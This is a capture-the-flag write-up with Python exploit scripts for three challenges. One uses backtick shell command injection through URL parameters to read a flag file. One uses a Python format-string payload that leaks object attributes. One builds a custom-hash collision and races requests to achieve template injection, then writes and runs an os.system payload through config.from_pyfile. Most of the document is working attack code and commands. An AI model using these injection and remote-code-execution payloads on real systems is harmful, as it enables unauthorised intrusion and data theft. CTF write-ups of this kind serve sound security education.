Vulnerability: command injection. The user-supplied input is interpolated, unescaped, into a shell command of the form `echo {input}`, so a backtick command substitution (`` `cmd` ``) inside the input runs arbitrary commands on the server. The exploit loop below drives this through the `tweet_1` / `tweet_2` parameters.
from requests import get
# Stage 1: print the flag recovered from the echo2 challenge.  The body of the
# flag was collected as decimal byte values (one per line below); prepend the
# known prefix and turn each value back into a character.  The list decodes to
# PCTF{L15st3n_T0__reee_reeeeee_reee_la}.
flag="PCTF{L"
x="""49
53
115
116
51
110
95
84
48
95
95
114
101
101
101
95
114
101
101
101
101
101
101
95
114
101
101
101
95
108
97
125""".split("\n")
for k in x:
    flag += chr(int(k))
print flag
# NOTE(review): this exit(1) stops the script right here -- the injection loop
# below only runs if this line is removed.  A non-zero status for a successful
# decode looks accidental.
exit(1)
# Sample audio links harvested from earlier runs (bare string, no effect).
"""
http://echo2.chal.pwning.xxx:9977/audio/13dfdabcb06240b28e9f847877601d94/2.wav
http://echo2.chal.pwning.xxx:9977/audio/91752b54f8fb416faac895ff8698ce81/2.wav
http://echo2.chal.pwning.xxx:9977/audio/0e3bc71c6baa4babb86cdad06690890f/2.wav
http://echo2.chal.pwning.xxx:9977/audio/52018cc316f4416cb9ac041cf25cfeeb/2.wav
http://echo2.chal.pwning.xxx:9977/audio/2ded2beb78b5425297a2fc3067537b06/2.wav
http://echo2.chal.pwning.xxx:9977/audio/43a03f68b3124db08bbb1f0e62a933d8/2.wav
"""
# Stage 2 (unreachable while the exit(1) above stands): exploit the command
# injection.  Each tweet_N value is interpolated into a shell `echo`, so the
# backtick-quoted commands run on the server.  URL-decoded, the two payloads are:
#   tweet_1 = `head /share/flag -c <65000*i> | tail -c 65000 > /tmp/x`
#             -> copy the i-th 65000-byte window of /share/flag to /tmp/x
#   tweet_2 = `python -c "exec('f=open(\'/tmp/x\',\'rb\');d=f.read();f.close();
#              j=0;c=64999\nfor i in range(c): j ^= ord(d[i])\nprint j^ord(d[c])')"`
#             -> print the XOR of all 65000 bytes of that window
# Windows 7..49 are requested.  Only the XOR fingerprint of each window leaves
# the box this way, not the bytes themselves; the page evidently embeds the
# command output as an audio clip (the .wav links above), and it is that clip's
# URL that gets printed for each window.
for i in range(7, 50):
    url = "http://echo2.chal.pwning.xxx:9977/?tweet_1=%60head+%2Fshare%2Fflag+-c+"+str(65000*i)+"+%7C+tail+-c+65000+%3E+%2Ftmp%2Fx%60&tweet_2=%60python+-c+%22exec%28%27f%3Dopen%28%5C%27%2Ftmp%2Fx%5C%27%2C+%5C%27rb%5C%27%29%3Bd%3Df.read%28%29%3Bf.close%28%29%3Bj%3D0%3Bc%3D64999%5Cnfor+i+in+range%28c%29%3A+j+%5E%3D+ord%28d%5Bi%5D%29%5Cnprint+j%5Eord%28d%5Bc%5D%29%27%29%22%60&tweet_3=&tweet_4="
    c = get(url)
    # Scrape the <source src="..."> of the "Tweet 2" section out of the HTML.
    # Caveat: every .split(...)[1] raises IndexError if the marker is missing
    # (e.g. an error page), which aborts the whole loop.
    x = c.content.split('<h2>Tweet 2</h2>')[1].split('<source src="')[1].split('"')[0]
    print "http://echo2.chal.pwning.xxx:9977/"+x
Vulnerability: an attacker-controlled format string in the rename function. The new name is passed straight to `str.format` with the Pykemon object as its positional argument:
return "Successfully renamed to:\n" + new_name.format(p)
Here `p` is the Pykemon object (`p = check(name, 'caught')`).
Because `str.format` resolves attribute and index lookups on its arguments, a name such as `{0.pykemon}` reads members of that object straight into the response — an information disclosure, not merely a display quirk. Input: `{0.pykemon}`
Vulnerability: a collision in the custom `sha4` hash, exploited together with a race condition by submitting the two colliding comments concurrently (make_collision.py builds the pair, poc.py races them).
make_collision.py
from sha4 import hash, seven_to_eight
import struct
from pyasn1.codec.ber.decoder import decode
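# Two comment bodies meant to collide under the challenge's custom sha4 hash.
# key1 carries a template expression wrapped in "{{ ... }}" (presumably a
# Jinja2-style SSTI sink on the server); key2 has the identical byte layout with
# the delimiters replaced by "yz" / "=]", i.e. it contains no template syntax.
# These ASCII builders document the layout; they are replaced just below by the
# hex forms, which additionally embed the ''.__class__... probe.
key1 = bytearray("\x01\x03BBBB{" + "{\x20\x33+\x33\x20\x20" + "\x20}}"+"\x43"+"\x20"*3+""+"AAAAAA{"+"{\x20\x20\x20\x20\x20\x20" + "\x20}}")
key2 = bytearray("\x01\x03BBBBy" + "z\x20\x33+\x33\x20\x20" + "\x20=]"+"\x43"+"\x20"*3+""+"AAAAAAy"+"z\x20\x20\x20\x20\x20\x20" + "\x20=]")
# Decoded: "\x01\x03BBBB{{ 3+3   }}C   AAAAAA{{      ''.__class__.__mro__[2].__subclasses__()   }}     "
# BUG FIX: .decode("hex") yields an immutable str, so the byte mutation in the
# loop below raised TypeError; keep both keys as bytearray as originally built.
key1 = bytearray("0103424242427b7b20332b332020207d7d432020204141414141417b7b20202020202027272e5f5f636c6173735f5f2e5f5f6d726f5f5f5b325d2e5f5f737562636c61737365735f5f28292020207d7d2020202020".decode("hex"))
# Decoded: same layout with "yz" / "=]" in place of "{{" / "}}".
key2 = bytearray("010342424242797a20332b332020203d5d43202020414141414141797a20202020202027272e5f5f636c6173735f5f2e5f5f6d726f5f5f5b325d2e5f5f737562636c61737365735f5f28292020203d5d2020202020".decode("hex"))
# 010300000041424344
# Sanity check that both bodies BER-decode (leading 01 03 = BOOLEAN tag, length
# 3); presumably mirrors how the server parses a comment -- confirm.
print(decode(str(key1)))
print(decode(str(key2)))
print(str(key1).encode("hex"))
print(str(key2).encode("hex"))
# sha4.hash is assumed to accept a bytearray (the original search loop always
# hashed one) -- confirm against the sha4 module.
print(hash(key1) == hash(key2))
# print key1 == key2
# Enumerate every value for byte 16 of key2 (the "]" of the first "=]") that
# still collides with key1, to learn which substitutes for "}" the hash ignores.
for i in range(0xff+1):
    key2[16] = i
    if hash(key1) == hash(key2):
        print("%s %s" % (chr(i), str(i)))
# print hash("\x01\x01\x01\x00\x00\x00\x00\x00").encode("hex")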
def fuck(x):
    """Regroup seven 7-bit units of *x* into eight bytes, one unit per byte.

    *x* must be exactly 7 bytes: a zero byte is appended so the whole thing
    unpacks as one little-endian 64-bit integer (struct.error otherwise).
    Bits 7k..7k+6 of that integer become the low 7 bits of output byte k, so
    bit 7 of every output byte is clear.  Both the unpacked input and the
    regrouped value are printed in hex for inspection; the 8-byte
    little-endian packing of the result is returned.

    NOTE(review): this looks related to sha4's seven_to_eight (imported above
    but unused here) -- confirm against that module before relying on it.
    """
    (packed,) = struct.unpack("Q", x + b"\x00")
    print(hex(packed))
    spread = 0
    for k in range(8):
        # k-th 7-bit group, relocated to bit offset 8*k.
        group = (packed >> (7 * k)) & 0b1111111
        spread |= group << (8 * k)
    print(hex(spread))
    return struct.pack("Q", spread)
# fuck("C" + "AAAAAA")
# fuck("C" + "AAAAAA")
poc.py
import os
import sys
import threading
from time import time, sleep

from requests import post
"""
key1 = bytearray("\x01\x03BBBB{" + "{\x20\x33+\x33\x20\x20" + "\x20}}"+"\x20"*4)
key2 = bytearray("\x01\x03BBBBy" + "z\x20\x33+\x33\x20\x20" + "\x20=]"+"\x20"*4)
0103424242427b7b20332b332020207d7d43202020
010342424242797a20332b332020203d5d43202020
"""
def pad(x):
    """Right-pad *x* with spaces up to the next multiple of 7 characters.

    The result is always strictly longer than *x*: an input whose length is
    already a multiple of 7 still gains a full 7-character block (7 -> 14,
    0 -> 7).  Presumably this guarantees a whole trailing block for the
    7-to-8-bit regrouping in make_collision.py -- confirm against sha4.
    """
    blocks = len(x) // 7 + 1
    return x.ljust(blocks * 7, " ")
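def example(fuck):
    """Post one of the two colliding comment bodies and stop on success.

    ``fuck`` selects the variant: True posts the body whose template delimiters
    ``{{ ... }}`` are intact, False posts the byte-for-byte equivalent with
    ``yz`` / ``=]`` in their place, which is expected to hash the same under
    sha4 but contains no template syntax.  Both embed the same command-line
    inputs, each space-padded to a multiple of 7 bytes by pad() and hex-encoded:
      sys.argv[1] -- the template expression to be evaluated
      sys.argv[2] -- auxiliary data the expression reaches by slicing the
                     comment (see the invocations at the end of the writeup)

    Success is a 200 response containing "B6": the body starts with
    ``BBBB{{ 3+3 }}``, so "BBBB6" shows the expression was evaluated.  The
    response is then printed and the whole process is terminated.

    Why os._exit: this runs in a worker thread (see the spawn loop below).  A
    plain ``exit(0)`` only raises SystemExit inside that thread, which the
    threading module swallows, so the main loop would keep spawning requests
    forever.  stdout is flushed first because os._exit skips interpreter
    cleanup.
    """
    url = "http://sha4.chal.pwning.xxx/comments"
    payload = sys.argv[1]
    asdf = sys.argv[2]
    if fuck:
        body = ('0103424242427b7b20332b332020207d7d43202020'
                + pad(asdf).encode('hex')
                + '4141414141417b7b202020202020'
                + pad(payload).encode('hex')
                + '207d7d2020202020')
    else:
        body = ('010342424242797a20332b332020203d5d43202020'
                + pad(asdf).encode('hex')
                + '414141414141797a202020202020'
                + pad(payload).encode("hex")
                + '203d5d2020202020')
    c1 = post(url, data={'comment': body})
    if c1.status_code == 200 and c1.content.find("B6") != -1:
        print(c1.content)
        sys.stdout.flush()
        os._exit(0)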
# print time()-a1
payload = "''.__class__.__mro__[2].__subclasses__()"
print '0103424242427b7b20332b332020207d7d432020204141414141417b7b202020202020'+pad(payload).encode('hex')+'207d7d2020202020'
print '010342424242797a20332b332020203d5d43202020414141414141797a202020202020'+pad(payload).encode("hex")+'203d5d2020202020'
while True:
th = threading.Thread(target=example, args=(False,))
th.start()
th = threading.Thread(target=example, args=(True,))
th.start()
# th.join()
# input 93
payload
Step 1 — write code to /var/tmp/comments/junoim. The template expression takes `object.__subclasses__()[40]` (used here as a file constructor, so presumably the `file` type on the target's Python 2) and slices its own comment body: `comment[93:96]` is the literal `hex` used as the codec name, `comment[96:144]` the hex-encoded path, `comment[144:146]` the open mode (`w`), and `comment[147:359]` the Python source to write — `import os; os.system('cat <flag file> > /var/tmp/comments/junoim')`.
python poc.py "config.__doc__.__class__.mro()[2].__subclasses__()[40](comment[96:144].decode(comment[93:96]), comment[144:146].decode(comment[93:96])).write(comment[147:359].decode(comment[93:96]))" "hex2f7661722f746d702f636f6d6d656e74732f6a756e6f696d77_696d706f7274206f733b6f732e73797374656d2827636174202f7661722f7777772f736861342f666c61675f62696c6161626c75616762696c75617269676c75626c61697265756772706f6f70203e202f7661722f746d702f636f6d6d656e74732f6a756e6f696d2729"
Step 2 — execute the written file via `config.from_pyfile`, which loads it as Python source, so the embedded `os.system` call runs:
python poc.py "config.from_pyfile(comment[96:144].decode(comment[93:96]))" "hex2f7661722f746d702f636f6d6d656e74732f6a756e6f696d77_696d706f7274206f733b6f732e73797374656d28276c732729"
Step 3 — read the flag back from that path with the same file class:
python poc.py "config.__doc__.__class__.mro()[2].__subclasses__()[40](comment[96:144].decode(comment[93:96])).read()" "hex2f7661722f746d702f636f6d6d656e74732f6a756e6f696d77_696d706f7274206f733b6f732e73797374656d28276c732729"
Note on sha4: there was an easier way to execute commands than this chain.